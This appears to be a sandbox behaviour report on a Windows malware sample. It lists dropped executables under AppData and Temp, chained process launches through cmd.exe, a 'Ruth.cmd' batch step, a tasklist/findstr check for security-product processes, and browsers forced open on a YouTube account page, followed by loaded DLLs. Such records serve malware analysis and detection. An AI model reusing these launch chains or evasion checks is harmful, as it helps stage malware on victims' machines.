Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: RoamingBKKFHIEGDH.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingAEGIJKEHCA.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
